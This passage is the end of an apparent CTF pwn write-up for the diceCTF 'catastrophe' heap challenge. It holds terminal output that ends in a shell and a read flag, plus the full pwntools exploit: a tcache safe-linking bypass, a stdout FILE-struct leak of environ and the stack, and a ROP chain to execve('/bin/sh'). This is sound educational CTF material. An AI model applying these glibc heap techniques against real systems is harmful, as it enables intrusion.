<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">nasm@off:~/Documents/pwn/diceCTF/catastrophe/f2$ python3 sexploit.py REMOTE HOST=mc.ax PORT=31273</span><br><span class="line">[*] <span class="string">&#x27;/home/nasm/Documents/pwn/diceCTF/catastrophe/f2/catastrophe&#x27;</span></span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Full RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      PIE enabled</span><br><span class="line">[+] Opening connection to mc.ax on port 31273: Done</span><br><span class="line">/home/nasm/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/<span class="comment">#bytes</span></span><br><span class="line">  res = self.recvuntil(delim, <span class="built_in">timeout</span>=<span class="built_in">timeout</span>)</span><br><span class="line">[*] heap @ 0x559cb0184000</span><br><span class="line">[*] libc: 0x7efe8a967000</span><br><span class="line">[*] environ: 0x7efe8ab88200</span><br><span class="line">[*] stdout: 0x7efe8ab81780</span><br><span class="line">[*] stack: 0x7ffe06420710</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line">$ <span class="built_in">id</span></span><br><span class="line">uid=1000 gid=1000 <span class="built_in">groups</span>=1000</span><br><span class="line">$ <span class="built_in">ls</span></span><br><span class="line">flag.txt</span><br><span class="line">run</span><br><span class="line">$ <span class="built_in">cat</span> flag.txt</span><br><span class="line">hope&#123;apparently_not_good_enough_33981d897c3b0f696e32d3c67ad4ed1e&#125;</span><br></pre></td></tr></table></figure>

<h1 id="Resources"><a href="#Resources" class="headerlink" title="Resources"></a>Resources</h1><ul>
<li><a target="_blank" rel="noopener" href="https://a1ex.online/2020/10/01/glibc-IO%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/">a1ex.online</a></li>
<li><a target="_blank" rel="noopener" href="https://ray-cp.github.io/archivers/IO_FILE_arbitrary_read_write">ray-cp</a></li>
<li><a target="_blank" rel="noopener" href="http://blog.leanote.com/post/mut3p1g/file-struct">Mutepig’s Blog</a></li>
</ul>
<h1 id="Appendices"><a href="#Appendices" class="headerlink" title="Appendices"></a>Appendices</h1><p>Final exploit:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># this exploit was generated via</span></span><br><span class="line"><span class="comment"># 1) pwntools</span></span><br><span class="line"><span class="comment"># 2) ctfmate</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> pwn</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Set up pwntools for the correct architecture</span></span><br><span class="line">exe = pwn.context.binary = pwn.ELF(<span class="string">&#x27;catastrophe&#x27;</span>)</span><br><span class="line">pwn.context.delete_corefiles = <span class="literal">True</span></span><br><span class="line">pwn.context.rename_corefiles = <span class="literal">False</span></span><br><span class="line">pwn.context.timeout = <span class="number">2000</span></span><br><span class="line"></span><br><span class="line">host = pwn.args.HOST <span class="keyword">or</span> <span class="string">&#x27;127.0.0.1&#x27;</span></span><br><span class="line">port = <span class="built_in">int</span>(pwn.args.PORT <span class="keyword">or</span> <span class="number">1337</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">local</span>(<span class="params">argv=[], *a, **kw</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;Execute the target binary locally&#x27;&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">if</span> pwn.args.GDB:</span><br><span class="line">        <span class="keyword">return</span> pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> pwn.process([exe.path] + argv, *a, **kw)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">remote</span>(<span class="params">argv=[], *a, **kw</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;Connect to the process on the remote host&#x27;&#x27;&#x27;</span></span><br><span class="line">    io = pwn.connect(host, port)</span><br><span class="line">    <span class="keyword">if</span> pwn.args.GDB:</span><br><span class="line">        pwn.gdb.attach(io, gdbscript=gdbscript)</span><br><span class="line">    <span class="keyword">return</span> io</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">start</span>(<span class="params">argv=[], *a, **kw</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;Start the exploit against the target.&#x27;&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">if</span> pwn.args.LOCAL:</span><br><span class="line">        <span class="keyword">return</span> local(argv, *a, **kw)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> remote(argv, *a, **kw)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">gdbscript = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">b* main</span></span><br><span class="line"><span class="string">source ~/Downloads/pwndbg/gdbinit.py</span></span><br><span class="line"><span class="string">continue</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>.<span class="built_in">format</span>(**<span class="built_in">locals</span>())</span><br><span class="line"></span><br><span class="line">io = <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">libc = pwn.ELF(<span class="string">&quot;libc.so.6&quot;</span>)</span><br><span class="line"></span><br><span class="line">io = start()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">alloc</span>(<span class="params">idx, data, size, s=<span class="literal">False</span></span>):</span><br><span class="line">   io.sendlineafter(<span class="string">&quot;-\n&gt; &quot;</span>, <span class="string">b&quot;1&quot;</span>) </span><br><span class="line">   io.sendlineafter(<span class="string">&quot;Index?\n&gt; &quot;</span>, <span class="built_in">str</span>(idx).encode()) </span><br><span class="line">   io.sendlineafter(<span class="string">&quot;&gt; &quot;</span>, <span class="built_in">str</span>(size).encode()) </span><br><span class="line">   </span><br><span class="line">   <span class="keyword">if</span> s:</span><br><span class="line">       io.sendafter(<span class="string">&quot;: &quot;</span>, data) </span><br><span class="line">   <span class="keyword">else</span>:</span><br><span class="line">       io.sendlineafter(<span class="string">&quot;: &quot;</span>, data) </span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">free</span>(<span class="params">idx</span>):</span><br><span class="line">   io.sendlineafter(<span class="string">&quot;&gt; &quot;</span>, <span class="string">b&quot;2&quot;</span>) </span><br><span class="line">   io.sendlineafter(<span class="string">&quot;&gt; &quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">view</span>(<span class="params">idx</span>):</span><br><span class="line">   io.sendlineafter(<span class="string">&quot;&gt; &quot;</span>, <span class="string">b&quot;3&quot;</span>) </span><br><span class="line">   io.sendlineafter(<span class="string">&quot;&gt; &quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    alloc(i, <span class="string">b&quot;&quot;</span>, <span class="number">0x100</span>)</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">view(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">heap = ((pwn.u64(io.recvline()[:-<span class="number">1</span>].ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>)) &lt;&lt; <span class="number">12</span>))</span><br><span class="line">pwn.log.info(<span class="string">f&quot;heap @ <span class="subst">&#123;<span class="built_in">hex</span>(heap)&#125;</span>&quot;</span>)</span><br><span class="line"><span class="comment"># then we defeated safe linking lol</span></span><br><span class="line"></span><br><span class="line">alloc(<span class="number">0</span>, <span class="string">b&quot;YY&quot;</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">7</span>, <span class="string">b&quot;YY&quot;</span>, <span class="number">0x100</span>)</span><br><span class="line">alloc(<span class="number">8</span>, <span class="string">b&quot;YY&quot;</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">9</span>, <span class="string">b&quot;/bin/sh\0&quot;</span>, <span class="number">0x10</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    free(i)</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">9</span>, <span class="string">b&quot;YY&quot;</span>, <span class="number">100</span>)</span><br><span class="line">free(<span class="number">9</span>)</span><br><span class="line"></span><br><span class="line">free(<span class="number">8</span>)</span><br><span class="line">free(<span class="number">7</span>)</span><br><span class="line">view(<span class="number">8</span>)</span><br><span class="line"></span><br><span class="line">libc.address = pwn.u64(io.recvline()[:-<span class="number">1</span>].ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>)) - <span class="number">0x219ce0</span> <span class="comment"># - 0x1bebe0 # offset of the unsorted bin</span></span><br><span class="line"></span><br><span class="line">rop = pwn.ROP(libc)</span><br><span class="line">binsh = <span class="built_in">next</span>(libc.search(<span class="string">b&quot;/bin/sh\x00&quot;</span>))</span><br><span class="line">rop.execve(binsh, <span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">environ = libc.address + <span class="number">0x221200</span> </span><br><span class="line">stdout = libc.address + <span class="number">0x21a780</span></span><br><span class="line"></span><br><span class="line">pwn.log.info(<span class="string">f&quot;libc: <span class="subst">&#123;<span class="built_in">hex</span>(libc.address)&#125;</span>&quot;</span>)</span><br><span class="line">pwn.log.info(<span class="string">f&quot;environ: <span class="subst">&#123;<span class="built_in">hex</span>(environ)&#125;</span>&quot;</span>)</span><br><span class="line">pwn.log.info(<span class="string">f&quot;stdout: <span class="subst">&#123;<span class="built_in">hex</span>(stdout)&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">0</span>, <span class="string">b&quot;YY&quot;</span>, <span class="number">0x100</span>)</span><br><span class="line">free(<span class="number">8</span>)</span><br><span class="line">alloc(<span class="number">1</span>, <span class="string">b&quot;T&quot;</span>*<span class="number">0x108</span> + pwn.p64(<span class="number">0x111</span>) + pwn.p64((stdout ^ ((heap + <span class="number">0xb20</span>) &gt;&gt; <span class="number">12</span>))), <span class="number">0x130</span>)</span><br><span class="line">alloc(<span class="number">2</span>, <span class="string">b&quot;TT&quot;</span>, <span class="number">0x100</span>)</span><br><span class="line">alloc(<span class="number">3</span>, pwn.p32(<span class="number">0xfbad1800</span>) + pwn.p32(<span class="number">0</span>) + pwn.p64(environ)*<span class="number">3</span> + pwn.p64(environ) + pwn.p64(environ + <span class="number">0x8</span>)*<span class="number">2</span> + pwn.p64(environ + <span class="number">8</span>) + pwn.p64(environ + <span class="number">8</span>), <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">stack = pwn.u64(io.recv(<span class="number">8</span>)[:-<span class="number">1</span>].ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>)) - <span class="number">0x130</span> - <span class="number">8</span><span class="comment"># - 0x1bebe0 # offset of the unsorted bin</span></span><br><span class="line">pwn.log.info(<span class="string">f&quot;stack: <span class="subst">&#123;<span class="built_in">hex</span>(stack)&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">free(<span class="number">1</span>) <span class="comment"># large</span></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">5</span>, <span class="string">b&quot;T&quot;</span>*<span class="number">0x108</span> + pwn.p64(<span class="number">0x111</span>) + pwn.p64((stack ^ ((heap + <span class="number">0xb20</span>) &gt;&gt; <span class="number">12</span>))), <span class="number">0x130</span>)</span><br><span class="line">alloc(<span class="number">2</span>, <span class="string">b&quot;TT&quot;</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">3</span>, pwn.p64(stack) + rop.chain(), <span class="number">0x100</span>) <span class="comment"># overwrite sRBP for nothing lmao</span></span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/posts/cshell2/"
      title="[corCTF 2022 - pwn] cshell2"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        [corCTF 2022 - pwn] cshell2
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/posts/kmem_cache/"
      title="[Linux kernel side notes - SLUB] kmem_cache"
     >

    <p class="title-text">
      
        [Linux kernel side notes - SLUB] kmem_cache
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2023 nasm<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.style.opacity = 1;
        } else {
            btn.style.opacity = 0;
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
